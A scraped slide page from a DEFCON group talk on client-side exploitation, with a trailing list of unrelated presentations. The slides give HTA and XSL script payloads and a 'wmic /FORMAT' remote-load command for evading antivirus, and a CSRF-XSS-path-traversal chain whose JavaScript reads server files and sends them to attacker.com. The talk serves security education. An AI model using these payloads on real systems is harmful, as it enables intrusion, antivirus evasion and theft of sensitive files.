dc3158 summary
play

DC3158 Summary Summary Client Side Exploitation Attack Chaining. - PowerPoint PPT Presentation

Feb 09, 2023 •266 likes •428 views

DEFCON DC3158 Summary Summary Client Side Exploitation Attack Chaining. Client Side Exploitation Script Based Attack Powershell,Jscript,Vbscript Vbscript:still people use IE, you can call wmic and powershell script to execute.

  1. DEFCON DC3158

  2. Summary Summary  Client Side Exploitation  Attack Chaining.

  3. Client Side Exploitation Script Based Attack Powershell,Jscript,Vbscript Vbscript:still people use IE, you can call wmic and powershell script to execute. • But Antivirus started flag powershell script . •

  4. Client Side Exploitation AMSI(Antimalware Scan Interface) Stream scanning on memory,file and URL. • Can be integrated in any application. • Most of the antivirus use it. •

  5. Client Side Exploitation How Do We Bypass HTA and XSL. • What is HTA? HTA’s are short for HTML Applications. And they’re basically a way to run a HTML app in a popout view, and are treated similar to an actual application, except they’re written in HTML. Ability to execute vbscript, which means you can execute commands. < script language="VBScript"> set objShell = CreateObject("Wscript.Shell") objShell.run "calc.exe" self.close </ script >

  6. Client Side Exploitation What is XSL? XSL, aka XLST, is a Microsoft Stylesheet Script Format . These payloads also contain the ability to run Microsoft scripting languages. <?xml version='1.0'?> < stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0"> < output method="text"/> < ms:script implements-prefix="user" language="JScript"> <![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); ]]> </ ms:script > </ stylesheet > Really cool thing with XSL file can load it in the windows command line remotely with WMI. wmic os get /FORMAT:"http://xx.xx.xx.xx/payload.xsl"

  7. Client Side Exploitation

  8. Client Side Exploitation

  9. Client Side Exploitation

  10. Client Side Exploitation

  11. Attack Chaining

  12. Attack Chaining CSRF Page will do XSS Request XSS Will give request to path Travsel Attack Chaining Using Path Travsel we could able read to sensitive information (like WAS Password File) Response of the path travesel will append to xss request.

  13. Attack Chaining 2 pages with 3 vulnerabilities: Authenticated XSS with no CSRF http://victim.com/authenticated/search?query=XSS authenticated path traversal page http://victim.com/authenticated/catFile.php?file=file.php Attack Chaining to bypass the authentication and dowload file and send to attacler! CSRF to bypass - create page containing an image that initiates the csrf and gets initial code execution using the search <img scr="http://victim.com/authenticated/search?query="><script src='http://attacker.com/xmlhttp-request.js></script>'" -------- "xmlhttp- request.js“ ----------------- http=new XMLHttpRequest(); http.onreadystatechange = function() { if (http.readyState==4) { window.location="http://www.attacker.com/" + http.responseText; } } http.open("GET","http://victim.com/authenticated/catFile.php?file=../../../../../../.././../../../",true); http.withCredentials = true; http.send(); } ------ END FILE ---------------------------------------

  14. Attack Chaining

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Summary 1. Summary of

Summary 1. Summary of

SIDS and Vanuatu Sustainable Energy for All Strategy Summary 1. Summary of SIDS-related projects by VIA 2. Detailed project summary for Vanuatu 3. Design philosophies

827 views • 36 slides
Search Summary Search Summary Some material from: D Lin, J You, JC Latombe 1 Search Summary #

Search Summary Search Summary Some material from: D Lin, J You, JC Latombe 1 Search Summary #

RN, Chapter 25 Search Summary Search Summary Some material from: D Lin, J You, JC Latombe 1 Search Summary # 1 Problem Solving as Search Blind Search Techniques Breadth-first (uniform cost) Depth-first Iterative

120 views • 8 slides
summary(dsm_x_tw) summary(dsm_xyb_tw) summary(dsm_xy_tw) Overview Estimating smooths How

summary(dsm_x_tw) summary(dsm_xyb_tw) summary(dsm_xy_tw) Overview Estimating smooths How

summary(dsm_x_tw) summary(dsm_xyb_tw) summary(dsm_xy_tw) Overview Estimating smooths How wiggly are things? Measuring wigglyness Splines What about these &quot;s&quot; things? Smoothing Translating maths into R Building a model, from

816 views • 34 slides
The Very Short Summary Friday, 17 May 19 OS Summary Why? Definition? OS IPC Processes

The Very Short Summary Friday, 17 May 19 OS Summary Why? Definition? OS IPC Processes

IN2140: Introduction to Operating Systems and Data Communication The Very Short Summary Friday, 17 May 19 OS Summary Why? Definition? OS IPC Processes Devices Interfaces Memory Storage mechanical mail boxes primitives system calls

479 views • 6 slides
1 Product Range Products 2 summary summary summary summary Relays with 8 and 11-Pins

1 Product Range Products 2 summary summary summary summary Relays with 8 and 11-Pins

1 Product Range Products 2 summary summary summary summary Relays with 8 and 11-Pins Timers with 8 and 11-Pins Power relays with 3 pole, 16A Industrial relays with 4 pole, 10A Miniature relays with 2 and 4 pole

1.08k views • 25 slides
CF3 Summary Non-WIMP Dark Ma5er Cosmic Fron:er Summary

CF3 Summary Non-WIMP Dark Ma5er Cosmic Fron:er Summary

CF3 Summary Non-WIMP Dark Ma5er Cosmic Fron:er Summary Talk Alex Kusenko Leslie Rosenberg Snowmass/Minneapolis, 29 July 06 August 2013 Recap:

630 views • 22 slides
CSEP 590B Summary Below, as a somewhat unusual course summary, I have decided to give

CSEP 590B Summary Below, as a somewhat unusual course summary, I have decided to give

CSEP 590B Summary Below, as a somewhat unusual course summary, I have decided to give the bulk of a research talk I presented in our CompBio seminar last spring, partly because I think the content is interesting, but more to show how

724 views • 28 slides
Security Summary Michael McCool Intel Osaka, W3C Web of Things F2F, 17 May 2017 Summary

Security Summary Michael McCool Intel Osaka, W3C Web of Things F2F, 17 May 2017 Summary

Security Summary Michael McCool Intel Osaka, W3C Web of Things F2F, 17 May 2017 Summary Summary Plenary Review of security process Breakout Review of Threat Model Stakeholders, Roles , Assets, Adversaries, Attack Surfaces,

385 views • 6 slides
Summary of Education Presentations 2020 pg 1 The following is a summary of education presentations

Summary of Education Presentations 2020 pg 1 The following is a summary of education presentations

Summary of Education Presentations 2020 pg 1 The following is a summary of education presentations available. Each presentation will begin with an age-appropriate Introduction to Maui Humane Society and conclude with a question and answer session

299 views • 6 slides
Summary Summary of of UPV UPV activities activities and and results results Mara

Summary Summary of of UPV UPV activities activities and and results results Mara

ICT for EU-India Cross Cultural Dissemination Summary Summary of of UPV UPV activities activities and and results results Mara Alpuente OUTLINE General profile of our node: ELP and RFIA Overview of ELP activities

664 views • 50 slides
Fundamentals of Robotic Surgery Summary of the Ongoing Project FRS Summary for Distribution at

Fundamentals of Robotic Surgery Summary of the Ongoing Project FRS Summary for Distribution at

Fundamentals of Robotic Surgery Summary of the Ongoing Project FRS Summary for Distribution at SLS 2012, Boston, MA Grants Leadership PIs: Roger Smith, PhD &amp; Vipul Patel, MD PI: Richard Satava, MD Florida Hospital Nicholson Center

571 views • 20 slides
GDRSD FINANCIAL GDRSD FINANCIAL GDRSD FINANCIAL GDRSD FINANCIAL OVERVIEW SUMMARY OVERVIEW

GDRSD FINANCIAL GDRSD FINANCIAL GDRSD FINANCIAL GDRSD FINANCIAL OVERVIEW SUMMARY OVERVIEW

GDRSD FINANCIAL GDRSD FINANCIAL GDRSD FINANCIAL GDRSD FINANCIAL OVERVIEW SUMMARY OVERVIEW SUMMARY OVERVIEW SUMMARY OVERVIEW SUMMARY Presented by Jeff Kubick &amp; Alison Manugian Groton(Dunstable Regional School Committee FY17 Goals &amp;

802 views • 33 slides
Summary of findings December 3, 2014 Summary of Key Results

Summary of findings December 3, 2014 Summary of Key Results

Business Roundtable / Change the Equa?on Survey on U.S. Workforce Skills Summary of findings December 3, 2014 Summary of Key Results This survey was

295 views • 13 slides
Summary of Chapter 1 (part 1) Summary of Python Functionality in INF1100 Programs must be

Summary of Chapter 1 (part 1) Summary of Python Functionality in INF1100 Programs must be

5mm. Summary of Chapter 1 (part 1) Summary of Python Functionality in INF1100 Programs must be accurate! Variables are names for objects We have met different object types: int , float , str Hans Petter Langtangen Choose variable names close

523 views • 11 slides
Summary of W Summary of Working Group rking Group A A GMS sub-regional training workshop on

Summary of W Summary of Working Group rking Group A A GMS sub-regional training workshop on

Summary of W Summary of Working Group rking Group A A GMS sub-regional training workshop on building capacity to deal with the illegal shipments of e-waste and near-end-of-life electronics Det Detecti ction, n, prev preventi ention and

58 views • 3 slides
Program Analysis 1 Summary Summary analysis of algorithms asymptotic analysis

Program Analysis 1 Summary Summary analysis of algorithms asymptotic analysis

csci 210: Data Structures Program Analysis 1 Summary Summary analysis of algorithms asymptotic analysis big-O big-Omega big-theta asymptotic notation commonly used functions discrete math

500 views • 33 slides
Upper Bound for Intermediate Singular Values of Random Sub-Gaussian Matrices 1 Feng Wei 2

Upper Bound for Intermediate Singular Values of Random Sub-Gaussian Matrices 1 Feng Wei 2

Upper Bound for Intermediate Singular Values of Random Sub-Gaussian Matrices 1 Feng Wei 2 University of Michigan July 29, 2016 1 This presentation is based a project under the supervision of M. Rudelson. 2 Partially supported by M. Rudelsons

729 views • 38 slides
Direct Numerical Simulation Large Eddy Simulation TURBULENT FLOWS AND INHERENT STRUCTURES Tony

Direct Numerical Simulation Large Eddy Simulation TURBULENT FLOWS AND INHERENT STRUCTURES Tony

Direct Numerical Simulation Large Eddy Simulation TURBULENT FLOWS AND INHERENT STRUCTURES Tony Saad May 2003 http://tsaad.utsi.edu - tsaad@utsi.edu CONTENTS Introduction to Turbulent Flows Governing Equations Random Fields

933 views • 41 slides
Window Flow Control Systems with Random Service Alireza Shekaramiz Joint work with Prof. J

Window Flow Control Systems with Random Service Alireza Shekaramiz Joint work with Prof. J

Window Flow Control Systems with Random Service Alireza Shekaramiz Joint work with Prof. J org Liebeherr and Prof. Almut Burchard April 6, 2016 1 / 20 Content Introduction 1 Related work 2 State-of-the-art 3 Results: Stochastic

415 views • 20 slides
The condensation phase transition in random graph coloring Victor Bapst Goethe University,

The condensation phase transition in random graph coloring Victor Bapst Goethe University,

The condensation phase transition in random graph coloring Victor Bapst Goethe University, Frankfurt Joint work with Amin Coja-Oghlan, Samuel Hetterich, Felicia Rassmann and Dan Vilenchik arXiv:1404.5513 Tuesday, May 6, 2014 Outline

801 views • 42 slides
MSIL to JavaScript Compiler Michael Ten-Pow Problem Description What is it? Why is it

MSIL to JavaScript Compiler Michael Ten-Pow Problem Description What is it? Why is it

MSIL to JavaScript Compiler Michael Ten-Pow Problem Description What is it? Why is it important? Why was it hard? What is it? A compiler - translates code into executable programs Input is an MSIL assembly (Microsoft .NET)

511 views • 26 slides
Domain Specific Embedded Software Solutions and Promotion of Embedded Linux in Korea Jung-Guk Kim

Domain Specific Embedded Software Solutions and Promotion of Embedded Linux in Korea Jung-Guk Kim

Domain Specific Embedded Software Solutions and Promotion of Embedded Linux in Korea Jung-Guk Kim Moon Hae Kim Hankuk University of Foreign Studies, Korea Konkuk University, Korea jgkim@ hufs.ac.kr mhkim@ konkuk.ac.kr Abstract these

251 views • 4 slides
The PeeringDB API Workshop // Track 2 arnold@peeringdb.com Agenda Please always use the

The PeeringDB API Workshop // Track 2 arnold@peeringdb.com Agenda Please always use the

The PeeringDB API Workshop // Track 2 arnold@peeringdb.com Agenda Please always use the tutorial DB at https://tutorial.peeringdb.com Introduction jq JSON HTML Operations Record Types Basic Records Derived Records

484 views • 30 slides
who am I? what is jquery? jquerys core philosophy get some elements. do some stuff. get

who am I? what is jquery? jquerys core philosophy get some elements. do some stuff. get

who am I? what is jquery? jquerys core philosophy get some elements. do some stuff. get some elements. but how? why reinvent the wheel? CSS 3 plus div div:first div:animated div:last div:contains( div#foo txt)

1.06k views • 76 slides

More recommend